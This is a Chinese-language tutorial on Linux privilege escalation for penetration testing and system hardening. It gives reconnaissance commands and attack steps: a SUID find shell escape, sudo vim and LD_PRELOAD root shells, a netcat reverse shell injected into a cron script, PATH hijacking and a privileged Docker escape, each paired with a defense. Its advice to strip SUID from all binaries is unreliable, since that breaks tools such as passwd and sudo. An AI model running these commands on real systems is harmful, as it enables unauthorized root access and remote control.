提权前如何做好信息收集？

在Linux系统中,提权（Privilege Escalation）指用户从普通权限提升至更高权限（如root）的过程。必须强调：未经授权的提权属于违法行为，本文仅用于安全研究、渗透测试或系统防御学习，操作需在合法授权环境下进行。
在尝试提权前，需全面收集系统信息：

1. 系统版本

   uname -a           # 内核版本
   cat /etc/os-release # 发行版信息

2. 用户与权限

   id                 # 当前用户权限
   sudo -l            # 检查可用的sudo命令
   cat /etc/passwd    # 用户列表

3. 敏感文件检查

   find / -perm -4000 -type f 2>/dev/null  # 查找SUID文件
   find / -writable 2>/dev/null            # 全局可写文件
   crontab -l                             # 计划任务

常见提权方法及防御

内核漏洞提权

• 原理：利用内核未修复的漏洞（如Dirty Pipe、Dirty COW）。
• 步骤：

  # 1. 识别漏洞
  searchsploit "Linux Kernel 5.8"  # 搜索漏洞库
  # 2. 编译并执行EXP（需上传）
  gcc exploit.c -o exploit && ./exploit

• 防御：定期更新内核（apt upgrade linux-image）。

SUID/SGID滥用

• 原理：SUID文件以所有者权限运行（如/bin/passwd）。
• 利用步骤：

  # 查找危险SUID文件（如find、vim、bash）
  find / -perm -u=s -type f 2>/dev/null
  # 利用find提权示例：
  touch /tmp/root_shell
  find /tmp/root_shell -exec /bin/sh \;

• 防御：限制SUID文件（chmod u-s /path/to/file）。

Sudo配置漏洞

• 原理：/etc/sudoers配置错误允许执行危险命令。
• 利用示例：

  # 若允许sudo执行vim：
  sudo vim -c ':!/bin/sh'
  # 若允许sudo执行环境变量（env_keep+LD_PRELOAD）：
  echo 'int main(){setgid(0);setuid(0);system("/bin/sh");}' > /tmp/privesc.c
  gcc -fPIC -shared -o /tmp/privesc.so /tmp/privesc.c
  sudo LD_PRELOAD=/tmp/privesc.so <允许的命令>

• 防御：审计sudo规则（visudo），避免通配符滥用。

计划任务（Cron Jobs）

• 原理：利用全局可写的计划任务脚本。
• 步骤：

  # 1. 查找可写Cron任务
  ls -la /etc/cron* /var/spool/cron
  # 2. 向脚本注入反向Shell
  echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f" >> /path/to/writable_script.sh

• 防御：限制Cron文件权限（chmod 600），避免路径劫持。

环境变量劫持（PATH）

• 原理：劫持PATH中的程序路径。
• 示例：

  # 若程序调用相对命令（如"service"）
  echo "/bin/sh" > /tmp/service
  chmod +x /tmp/service
  export PATH=/tmp:$PATH
  # 等待SUID程序调用"service"

• 防御：程序使用绝对路径，用户PATH规范化。

服务提权（Systemd/Docker）

• 原理：滥用服务权限或容器逃逸。
• 方法：
  • 服务配置错误：修改可写的服务文件（/etc/systemd/system/），重启后生效。
  • Docker逃逸：若在容器内且以--privileged运行，尝试挂载宿主机磁盘：

    mkdir /mnt/host
    mount /dev/sda1 /mnt/host   # 挂载宿主机根目录
    chroot /mnt/host /bin/bash

• 防御：限制服务文件权限，避免容器特权模式。

自动化工具辅助

• 信息收集：
  • LinPEAS：自动扫描常见提权路径。
  • LinEnum：快速检测系统配置风险。
• 漏洞利用：
  • Linux Exploit Suggester：匹配内核漏洞。

防御建议

1. 最小权限原则：用户和服务按需分配权限。
2. 定期更新：及时修补内核及软件（apt update && apt upgrade）。
3. 审计配置：
   • 清理无用SUID文件：find / -perm -4000 -exec chmod u-s {} \;
   • 限制sudo权限：visudo中移除不必要的NOPASSWD。
4. 监控日志：分析/var/log/auth.log和/var/log/syslog。

法律与道德声明

• 合法授权：提权操作仅限渗透测试或自有系统，严禁非法入侵。
• 风险自担：未经授权的提权可能导致法律诉讼及系统崩溃。
• 防御优先：本文旨在帮助管理员加固系统，非攻击教程。

引用说明：
本文参考了OWASP权限提升指南、Linux手册页及GTFOBins（SUID利用库），工具来源GitHub官方仓库，遵循各自开源协议。